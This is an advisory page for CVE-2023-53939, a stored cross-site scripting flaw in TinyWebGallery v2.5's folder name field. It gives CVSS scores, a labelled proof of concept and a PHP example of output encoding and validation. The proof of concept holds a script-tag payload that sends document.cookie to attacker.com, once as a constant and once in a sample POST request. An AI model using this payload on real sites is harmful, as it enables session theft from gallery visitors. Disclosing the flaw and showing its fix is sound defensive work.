Security Vulnerability Report
CVE-2023-53939 CVSS 5.4 MEDIUM

CVE-2023-53939

Published: 2025-12-18 20:15:52
Last Modified: 2025-12-24 16:46:55

Description

TinyWebGallery v2.5 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts through the folder name parameter. Attackers can edit album folder names with script tags to execute arbitrary JavaScript when other users view the affected gallery pages.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N (exploitability 2.3, impact 2.7)
CVSS 4.0 (same record): 5.1 MEDIUM, vector CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Weakness: CWE-79 (Improper Neutralization of Input During Web Page Generation, "Cross-site Scripting")

Configurations (Affected Products)

cpe:2.3:a:tinywebgallery:tinywebgallery:2.5:*:*:*:*:*:*:* - VULNERABLE
TinyWebGallery v2.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
JavaScript
// CVE-2023-53939 Stored XSS PoC
// Target: TinyWebGallery v2.5
// Attack Vector: Album folder name parameter

// Step 1: Authenticate with low-privilege account
const loginUrl = 'http://target.com/tinywebgallery/login.php';
const credentials = { username: 'attacker', password: 'password123' };

// Step 2: Navigate to folder management
const folderEditUrl = 'http://target.com/tinywebgallery/admin.php?action=editFolder&id=1';

// Step 3: Inject malicious XSS payload via folder name parameter
const xssPayload = '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>';
const maliciousFolderName = xssPayload;

// The malicious script will be stored and executed when other users view the gallery page
// The malicious script runs automatically when a victim visits the gallery page

// Example HTTP request to inject XSS:
/*
POST /tinywebgallery/admin.php?action=saveFolder HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

folder_name=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>&folder_id=1
*/
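For the defender's side, an added illustration of the rendering pattern behind a stored XSS of this kind and its fix. This is not TinyWebGallery's own code: the function names, the $folderName variable and the folder-name format rule are assumptions for the example.

```php
<?php
// Added illustration (not TinyWebGallery's code): how a stored XSS like
// CVE-2023-53939 arises and how folder-name output should be encoded.
// $folderName is assumed to be the value saved from the folder_name
// parameter shown in the PoC request above.

// Vulnerable pattern: the stored folder name is written into the page as-is,
// so a name such as <script>...</script> becomes live markup for every viewer.
function renderAlbumHeadingUnsafe(string $folderName): string
{
    return "<h2 class=\"album\">$folderName</h2>";
}

// Hardened pattern: contextual output encoding. htmlspecialchars() turns the
// HTML-significant characters (<, >, &, quotes) into entities, so the browser
// shows the name as text instead of parsing it as markup.
function renderAlbumHeading(string $folderName): string
{
    $safe = htmlspecialchars($folderName, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<h2 class=\"album\">$safe</h2>";
}

// Defence in depth on the write path (assumed rule): a gallery folder name
// has no business containing markup or path separators, so reject those
// when the folder is saved, not only when it is displayed.
function isAcceptableFolderName(string $folderName): bool
{
    return (bool) preg_match('/^[\p{L}\p{N} _.\-]{1,64}$/u', $folderName)
        && $folderName !== '.' && $folderName !== '..';
}

// Constructed sample, benign stand-in for the advisory's script-tag payload.
$sample = '<script>alert(1)</script>';
echo renderAlbumHeadingUnsafe($sample), "\n";      // markup survives: XSS
echo renderAlbumHeading($sample), "\n";            // &lt;script&gt;...: inert text
var_dump(isAcceptableFolderName($sample));         // bool(false)
var_dump(isAcceptableFolderName('Holiday 2023'));  // bool(true)
```

Output encoding at the point of rendering is the actual fix for CWE-79; the save-time check only narrows the attack surface and must not replace it.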

References

http://www.tinywebgallery.com/ (Product)
https://www.exploit-db.com/exploits/51442 (Exploit, Third Party Advisory, VDB Entry)
https://www.vulncheck.com/advisories/tinywebgallery-stored-cross-site-scripting-via-folder-name-parameter (Third Party Advisory)
